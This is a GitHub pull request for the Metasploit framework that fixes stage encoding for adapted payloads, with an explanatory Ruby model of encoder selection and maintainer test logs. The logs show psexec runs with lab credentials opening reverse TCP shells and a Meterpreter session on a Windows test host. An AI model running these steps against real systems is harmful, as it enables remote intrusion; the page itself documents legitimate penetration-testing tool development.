Fix adapted payload stage encoding #17721

Merged: 2 commits, Mar 2, 2023

Conversation

@zeroSteiner (Contributor) commented Mar 1, 2023

This fixes issue #17720 where payloads that were adapted were failing when stage encoding was enabled. This was due to the stage encoding assuming that the stage arch+platform were the same as the payload / stager. The adapters break this assumption by allowing them to be different values.

This update modifies the Stager mixin to use the new stage_arch and stage_platform values for determining compatible encoders. These new attributes default to the payload values but are set to the adapted values by adapted payloads. This ensures that the stage is able to be encoded correctly by properly selecting a compatible encoder. The EncodedPayload class was also updated to allow an explicit Arch and Platform to be specified, which the stager uses to pass the stage information for use instead of the original payload's.

This also updates the Windows shell stage to honor the EnableStageEncoding option by not overriding enable_stage?. Instead, the EnableStageEncoding option is set as a default value, since it makes sense, but this way users can still turn it off if they'd like.

Verification

Start msfconsole and try payloads in staged and unstaged configurations that are both adapted and not adapted.

  • Start msfconsole and use the psexec module. Set all options as appropriate including the RHOST, authentication information and LHOST
  • Try each of the following combinations and see that they all work:
    • run TARGET=Command PAYLOAD=cmd/windows/powershell/shell/reverse_tcp EnableStageEncoding=true
      • This demonstrates that the original issue was fixed. Without these changes, this would fail. See the output that the stage is encoded with the "Encoded stage with..." message.
    • run TARGET=Command PAYLOAD=cmd/windows/powershell/shell/reverse_tcp EnableStageEncoding=false
      • This demonstrates that the change to the shell stage allows the EnableStageEncoding option to be set. See in the output that the stage is not encoded.
    • run TARGET=Command PAYLOAD=cmd/windows/powershell/shell_reverse_tcp
      • This demonstrates an unstaged, adapted payload still works.
    • run TARGET=Automatic PAYLOAD=windows/x64/meterpreter/reverse_tcp EnableStageEncoding=true
      • This demonstrates that a staged, non-adapted payload still works with stage encoding.
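
As an added illustration of the selection problem described in this PR (example code written for this page, not Metasploit's own; Stager, AdaptedStager, Encoder, ENCODERS and encode_stage are hypothetical stand-ins for the framework's Stager mixin, adapters and EncodedPayload, and the arch/platform strings are constructed values), this models a non-adapted x86 Windows stager beside a cmd-adapted one. Keying the encoder search on the stager's own arch finds nothing for the adapted payload and falls back to no encoding; keying it on stage_arch/stage_platform picks an x86 encoder. The fixed path also takes an EnableStageEncoding-style flag so the disabled case sends the stage as-is.

```ruby
# Added example, not Metasploit code: every constant, class and method here
# is a local stand-in for the framework pieces named in the PR description.

ARCH_X86 = 'x86'
ARCH_X64 = 'x64'
ARCH_CMD = 'cmd'            # an adapter's outer form: a command string
PLATFORM_WINDOWS = 'windows'

# Toy encoder: a name plus the arch/platform pairs it can encode for.
Encoder = Struct.new(:name, :archs, :platforms) do
  def compatible?(arch, platform)
    archs.include?(arch) && platforms.include?(platform)
  end

  # Stand-in transform; a real encoder emits a decoder stub plus data.
  def encode(bytes)
    "#{name}[#{bytes}]"
  end
end

# Constructed encoder table; only binary encoders, as in the logs on this page.
ENCODERS = [
  Encoder.new('x86/shikata_ga_nai', [ARCH_X86], [PLATFORM_WINDOWS, 'linux']),
  Encoder.new('x64/xor_dynamic',    [ARCH_X64], [PLATFORM_WINDOWS, 'linux'])
].freeze

# Staged payload. arch/platform describe the stager as delivered;
# stage_arch/stage_platform describe the stage sent over the wire.
# For a non-adapted payload both pairs are identical (the old assumption).
class Stager
  attr_reader :arch, :platform, :stage

  def initialize(arch:, platform:, stage:)
    @arch = arch
    @platform = platform
    @stage = stage
  end

  def stage_arch
    arch
  end

  def stage_platform
    platform
  end
end

# An adapter (e.g. a PowerShell command wrapping a native stager) changes the
# outer arch to ARCH_CMD while the stage is still x86 Windows code.
class AdaptedStager < Stager
  def initialize(adapter_arch:, adapter_platform:, inner:)
    super(arch: adapter_arch, platform: adapter_platform, stage: inner.stage)
    @inner = inner
  end

  def stage_arch
    @inner.stage_arch
  end

  def stage_platform
    @inner.stage_platform
  end
end

# Encode a stage for an explicit arch/platform, the EncodedPayload-style
# interface the PR describes. Returns [encoder_name_or_nil, bytes]; a nil name
# is the "StageEncoder failed, falling back to no encoding" path.
def encode_stage(stage, arch:, platform:)
  encoder = ENCODERS.find { |e| e.compatible?(arch, platform) }
  encoder ? [encoder.name, encoder.encode(stage)] : [nil, stage]
end

# Before the fix: the encoder search keyed on the stager's own values.
def encode_stage_old(stager)
  encode_stage(stager.stage, arch: stager.arch, platform: stager.platform)
end

# After the fix: keyed on stage_arch/stage_platform, and honoring an
# EnableStageEncoding-style switch (hypothetical parameter name).
def encode_stage_fixed(stager, enable_stage_encoding: true)
  return [nil, stager.stage] unless enable_stage_encoding

  encode_stage(stager.stage, arch: stager.stage_arch, platform: stager.stage_platform)
end

NATIVE  = Stager.new(arch: ARCH_X86, platform: PLATFORM_WINDOWS, stage: 'STAGE_X86')
ADAPTED = AdaptedStager.new(adapter_arch: ARCH_CMD, adapter_platform: PLATFORM_WINDOWS,
                            inner: NATIVE)

if __FILE__ == $PROGRAM_NAME
  p encode_stage_old(NATIVE)     # ["x86/shikata_ga_nai", "x86/shikata_ga_nai[STAGE_X86]"]
  p encode_stage_old(ADAPTED)    # [nil, "STAGE_X86"]  -> no encoder matches arch "cmd"
  p encode_stage_fixed(ADAPTED)  # ["x86/shikata_ga_nai", "x86/shikata_ga_nai[STAGE_X86]"]
  p encode_stage_fixed(ADAPTED, enable_stage_encoding: false)  # [nil, "STAGE_X86"]
end
```

The point of keeping encode_stage's arch/platform explicit is that the caller decides which pair describes the bytes being encoded; the stager passes the stage's pair, which for a non-adapted payload is the same as its own and for an adapted one is the inner payload's.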

@smcintyre-r7 smcintyre-r7 linked an issue Mar 1, 2023 that may be closed by this pull request
@bwatters-r7 bwatters-r7 self-assigned this Mar 2, 2023
@sempervictus (Contributor) commented:
Excellent! Thank you - this will pay dividends when we upstream w^x stagers as stage encoding needs RWX which doesn't play well there. Should also let me clean up the RC4 x86 hackery - register pressure requires X on the memory region being decrypted whereas x64 handles decryption just fine with RW.

@bwatters-r7 (Contributor) commented:
Old and busted:

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                10.5.134.159     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basic
                                                    s/using-metasploit.html
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               v3Mpassword      no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read
                                                    /write folder share
   SMBUser               Administrator    no        The username to authenticate as


Payload options (cmd/windows/powershell/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4585             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run

[*] Powershell command length: 4202
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] 10.5.134.159:445 - Connecting to the server...
[*] 10.5.134.159:445 - Authenticating to 10.5.134.159:445 as user 'Administrator'...
[!] 10.5.134.159:445 - No active DB -- Credential data will not be saved!
[*] 10.5.134.159:445 - Executing the command...
[*] 10.5.134.159:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Obtaining a service manager handle...
[*] 10.5.134.159:445 - Creating the service...
[+] 10.5.134.159:445 - Successfully created the service
[*] 10.5.134.159:445 - Starting the service...
[+] 10.5.134.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.5.134.159:445 - Removing the service...
[+] 10.5.134.159:445 - Successfully removed the service
[*] 10.5.134.159:445 - Closing service handle...
[!] StageEncoder failed, falling back to no encoding
[*] Sending encoded stage (0 bytes) to 10.5.134.159
[*] 10.5.134.159:445 - Checking if the file is unlocked...
[*] 10.5.134.159:445 - Getting the command output...
[*] 10.5.134.159:445 - Command finished with no output
[*] 10.5.134.159:445 - Executing cleanup...
[+] 10.5.134.159:445 - Cleanup was successful

New and improved:

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                10.5.134.159     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basic
                                                    s/using-metasploit.html
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               v3Mpassword      no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read
                                                    /write folder share
   SMBUser               Administrator    no        The username to authenticate as


Payload options (cmd/windows/powershell/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4585             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run

[*] Powershell command length: 4171
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] 10.5.134.159:445 - Connecting to the server...
[*] 10.5.134.159:445 - Authenticating to 10.5.134.159:445 as user 'Administrator'...
[!] 10.5.134.159:445 - No active DB -- Credential data will not be saved!
[*] 10.5.134.159:445 - Executing the command...
[*] 10.5.134.159:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Obtaining a service manager handle...
[*] 10.5.134.159:445 - Creating the service...
[+] 10.5.134.159:445 - Successfully created the service
[*] 10.5.134.159:445 - Starting the service...
[*] Sending stage (240 bytes) to 10.5.134.159
[+] 10.5.134.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.5.134.159:445 - Removing the service...
[+] 10.5.134.159:445 - Successfully removed the service
[*] 10.5.134.159:445 - Closing service handle...
[*] 10.5.134.159:445 - Checking if the file is unlocked...
[-] 10.5.134.159:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 10.5.134.159:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 10.5.134.159:445 - Getting the command output...
[*] Command shell session 1 opened (10.5.135.201:4585 -> 10.5.134.159:64510) at 2023-03-02 13:53:08 -0600
[-] 10.5.134.159:445 - Unable to read file \Windows\Temp\CpklINstasnMxw.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 10.5.134.159:445 - Error getting command output
[*] 10.5.134.159:445 - Executing cleanup...
[+] 10.5.134.159:445 - Cleanup was successful


Shell Banner:
Microsoft Windows [Version 10.0.14393]

More testing:

msf6 exploit(windows/smb/psexec) > set enablestageencoding true
enablestageencoding => true
msf6 exploit(windows/smb/psexec) > run

[*] Powershell command length: 4191
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] 10.5.134.159:445 - Connecting to the server...
[*] 10.5.134.159:445 - Authenticating to 10.5.134.159:445 as user 'Administrator'...
[!] 10.5.134.159:445 - No active DB -- Credential data will not be saved!
[*] 10.5.134.159:445 - Executing the command...
[*] 10.5.134.159:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Obtaining a service manager handle...
[*] 10.5.134.159:445 - Creating the service...
[+] 10.5.134.159:445 - Successfully created the service
[*] 10.5.134.159:445 - Starting the service...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.5.134.159
[+] 10.5.134.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.5.134.159:445 - Removing the service...
[+] 10.5.134.159:445 - Successfully removed the service
[*] 10.5.134.159:445 - Closing service handle...
[*] 10.5.134.159:445 - Checking if the file is unlocked...
[-] 10.5.134.159:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 10.5.134.159:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 10.5.134.159:445 - Getting the command output...
[*] Command shell session 2 opened (10.5.135.201:4585 -> 10.5.134.159:64519) at 2023-03-02 13:54:47 -0600
[-] 10.5.134.159:445 - Unable to read file \Windows\Temp\fsQssHzy.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 10.5.134.159:445 - Error getting command output
[*] 10.5.134.159:445 - Executing cleanup...
[+] 10.5.134.159:445 - Cleanup was successful


Shell Banner:
Microsoft Windows [Version 10.0.14393]
-----
          

C:\Windows\system32>exit
exit

[*] 10.5.134.159 - Command shell session 2 closed.  Reason: User exit

msf6 exploit(windows/smb/psexec) > set enablestageencoding false
enablestageencoding => false
msf6 exploit(windows/smb/psexec) > run

[*] Powershell command length: 4192
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] 10.5.134.159:445 - Connecting to the server...
[*] 10.5.134.159:445 - Authenticating to 10.5.134.159:445 as user 'Administrator'...
[!] 10.5.134.159:445 - No active DB -- Credential data will not be saved!
[*] 10.5.134.159:445 - Executing the command...
[*] 10.5.134.159:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Obtaining a service manager handle...
[*] 10.5.134.159:445 - Creating the service...
[+] 10.5.134.159:445 - Successfully created the service
[*] 10.5.134.159:445 - Starting the service...
[*] Sending stage (240 bytes) to 10.5.134.159
[+] 10.5.134.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.5.134.159:445 - Removing the service...
[+] 10.5.134.159:445 - Successfully removed the service
[*] 10.5.134.159:445 - Closing service handle...
[*] 10.5.134.159:445 - Checking if the file is unlocked...
[-] 10.5.134.159:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 10.5.134.159:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 10.5.134.159:445 - Getting the command output...
[*] Command shell session 3 opened (10.5.135.201:4585 -> 10.5.134.159:64520) at 2023-03-02 13:55:08 -0600
[-] 10.5.134.159:445 - Unable to read file \Windows\Temp\YrBOXgtKQfxkMa.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 10.5.134.159:445 - Error getting command output
[*] 10.5.134.159:445 - Executing cleanup...
[+] 10.5.134.159:445 - Cleanup was successful


Shell Banner:
Microsoft Windows [Version 10.0.14393]
-----
          

C:\Windows\system32>exit
exit

[*] 10.5.134.159 - Command shell session 3 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) > set target Automatic 
target => Automatic
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set enablestageencoding true
enablestageencoding => true

msf6 exploit(windows/smb/psexec) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(windows/smb/psexec) > set lport 4585
lport => 4585
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] 10.5.134.159:445 - Connecting to the server...
[*] 10.5.134.159:445 - Authenticating to 10.5.134.159:445 as user 'Administrator'...
[!] 10.5.134.159:445 - No active DB -- Credential data will not be saved!
[*] 10.5.134.159:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 10.5.134.159:445 - PowerShell found
[*] 10.5.134.159:445 - Selecting PowerShell target
[*] 10.5.134.159:445 - Powershell command length: 4471
[*] 10.5.134.159:445 - Executing the payload...
[*] 10.5.134.159:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Obtaining a service manager handle...
[*] 10.5.134.159:445 - Creating the service...
[+] 10.5.134.159:445 - Successfully created the service
[*] 10.5.134.159:445 - Starting the service...
[+] 10.5.134.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.5.134.159:445 - Removing the service...
[+] 10.5.134.159:445 - Successfully removed the service
[*] 10.5.134.159:445 - Closing service handle...
[*] Encoded stage with x64/xor_dynamic
[*] Sending encoded stage (201525 bytes) to 10.5.134.159
[*] Encoded stage with x64/xor_dynamic
[*] Sending encoded stage (201525 bytes) to 10.5.134.159
[*] Meterpreter session 5 opened (10.5.135.201:4585 -> 10.5.134.159:64523) at 2023-03-02 13:56:20 -0600

meterpreter > sysinfo
Computer        : APT_WIN2016X64
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : TESTDOMAIN
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > 

@bwatters-r7 bwatters-r7 added the rn-fix release notes fix label Mar 2, 2023
@bwatters-r7 bwatters-r7 merged commit 5b4962e into rapid7:master Mar 2, 2023
@bwatters-r7 (Contributor) commented:
Release Notes

This fixes an issue where payloads that were adapted failed when stage encoding was enabled because the stage encoding was based on the stager arch and platform values. These values were always the same until we introduced adapted payloads, which can vary.

Labels: rn-fix (release notes fix)

Linked issue this pull request may close: Adapted payloads fail stage encoding